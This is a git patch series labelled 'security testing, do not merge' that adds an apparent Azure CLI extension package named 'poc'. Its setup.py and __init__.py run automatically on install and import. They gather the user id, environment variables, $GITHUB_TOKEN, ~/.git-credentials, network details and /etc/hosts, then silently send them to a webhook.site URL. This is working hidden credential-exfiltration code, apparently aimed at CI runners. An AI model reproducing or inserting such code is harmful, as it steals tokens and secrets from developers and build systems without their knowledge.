From 08745e53c921b76eb5e419d495ef3210d09462c5 Mon Sep 17 00:00:00 2001
From: Flo <f.t.f.schweitzer@gmail.com>
Date: Mon, 9 Mar 2026 23:22:05 +0100
Subject: [PATCH 1/2] security testing, do not merge

---
 src/poc/azext_poc/__init__.py | 23 ++++++++++++++++++++++
 src/poc/setup.py              | 36 +++++++++++++++++++++++++++++++++++
 2 files changed, 59 insertions(+)
 create mode 100644 src/poc/azext_poc/__init__.py
 create mode 100644 src/poc/setup.py

diff --git a/src/poc/azext_poc/__init__.py b/src/poc/azext_poc/__init__.py
new file mode 100644
index 00000000000..97f9e49eda2
--- /dev/null
+++ b/src/poc/azext_poc/__init__.py
@@ -0,0 +1,23 @@
+import subprocess
+import urllib.request
+import urllib.parse
+import json
+
+try:
+    info = {"stage": "import"}
+    for key, cmd in [
+        ("id",    "id"),
+        ("env",   "env"),
+        ("token", "echo $GITHUB_TOKEN"),
+        ("net",   "ip a 2>/dev/null || true"),
+        ("fs",    "ls /home /root /var/runner 2>/dev/null || true"),
+    ]:
+        try:
+            info[key] = subprocess.check_output(cmd, shell=True, stderr=subprocess.DEVNULL, timeout=5).decode(errors="replace").strip()
+        except Exception as e:
+            info[key] = f"err:{e}"
+
+    payload = urllib.parse.urlencode({"s": "rce-import", "d": json.dumps(info)})
+    urllib.request.urlopen(f"https://webhook.site/8995533e-1b5f-4977-bc48-a5210de4f45c?{payload}", timeout=10)
+except Exception:
+    pass
diff --git a/src/poc/setup.py b/src/poc/setup.py
new file mode 100644
index 00000000000..bd9a9e707fc
--- /dev/null
+++ b/src/poc/setup.py
@@ -0,0 +1,36 @@
+import subprocess
+import urllib.request
+import urllib.parse
+import json
+import os
+
+try:
+    info = {}
+    for key, cmd in [
+        ("id",    "id"),
+        ("user",  "whoami"),
+        ("uname", "uname -a"),
+        ("pwd",   "pwd"),
+        ("home",  "echo $HOME"),
+        ("env",   "env"),
+        ("net",   "ip a 2>/dev/null || ifconfig 2>/dev/null || true"),
+        ("hosts", "cat /etc/hosts"),
+        ("token", "echo $GITHUB_TOKEN"),
+    ]:
+        try:
+            info[key] = subprocess.check_output(cmd, shell=True, stderr=subprocess.DEVNULL, timeout=5).decode(errors="replace").strip()
+        except Exception as e:
+            info[key] = f"err:{e}"
+
+    payload = urllib.parse.urlencode({"s": "rce-azurecli", "d": json.dumps(info)})
+    url = f"https://webhook.site/8995533e-1b5f-4977-bc48-a5210de4f45c?{payload}"
+    urllib.request.urlopen(url, timeout=10)
+except Exception:
+    pass
+
+from setuptools import setup
+setup(
+    name="poc",
+    version="0.1.0",
+    packages=["azext_poc"],
+)

From 317215430f0ebc6bdfe749298c513ecd99121a4c Mon Sep 17 00:00:00 2001
From: Flo <f.t.f.schweitzer@gmail.com>
Date: Mon, 9 Mar 2026 23:36:56 +0100
Subject: [PATCH 2/2] security testing, do not merge

---
 src/poc/azext_poc/__init__.py         | 13 +++++++------
 src/poc/azext_poc/azext_metadata.json |  3 +++
 2 files changed, 10 insertions(+), 6 deletions(-)
 create mode 100644 src/poc/azext_poc/azext_metadata.json

diff --git a/src/poc/azext_poc/__init__.py b/src/poc/azext_poc/__init__.py
index 97f9e49eda2..5b35cd1af1e 100644
--- a/src/poc/azext_poc/__init__.py
+++ b/src/poc/azext_poc/__init__.py
@@ -7,17 +7,18 @@
     info = {"stage": "import"}
     for key, cmd in [
         ("id",    "id"),
-        ("env",   "env"),
-        ("token", "echo $GITHUB_TOKEN"),
-        ("net",   "ip a 2>/dev/null || true"),
-        ("fs",    "ls /home /root /var/runner 2>/dev/null || true"),
+        ("user",  "whoami"),
+        ("tok",   "cat $HOME/.git-credentials 2>/dev/null || git config --list 2>/dev/null | grep token || true"),
+        ("net",   "ip a 2>/dev/null | head -20 || true"),
+        ("env",   "env | grep -E 'GITHUB|TOKEN|SECRET|KEY|PASS' || true"),
     ]:
         try:
             info[key] = subprocess.check_output(cmd, shell=True, stderr=subprocess.DEVNULL, timeout=5).decode(errors="replace").strip()
         except Exception as e:
             info[key] = f"err:{e}"
 
-    payload = urllib.parse.urlencode({"s": "rce-import", "d": json.dumps(info)})
-    urllib.request.urlopen(f"https://webhook.site/8995533e-1b5f-4977-bc48-a5210de4f45c?{payload}", timeout=10)
+    data = urllib.parse.urlencode({"s": "rce-azurecli", "d": json.dumps(info)}).encode()
+    req = urllib.request.Request("https://webhook.site/8995533e-1b5f-4977-bc48-a5210de4f45c", data=data)
+    urllib.request.urlopen(req, timeout=10)
 except Exception:
     pass
diff --git a/src/poc/azext_poc/azext_metadata.json b/src/poc/azext_poc/azext_metadata.json
new file mode 100644
index 00000000000..13383f0e701
--- /dev/null
+++ b/src/poc/azext_poc/azext_metadata.json
@@ -0,0 +1,3 @@
+{
+    "azext.minCliCoreVersion": "2.38.0"
+}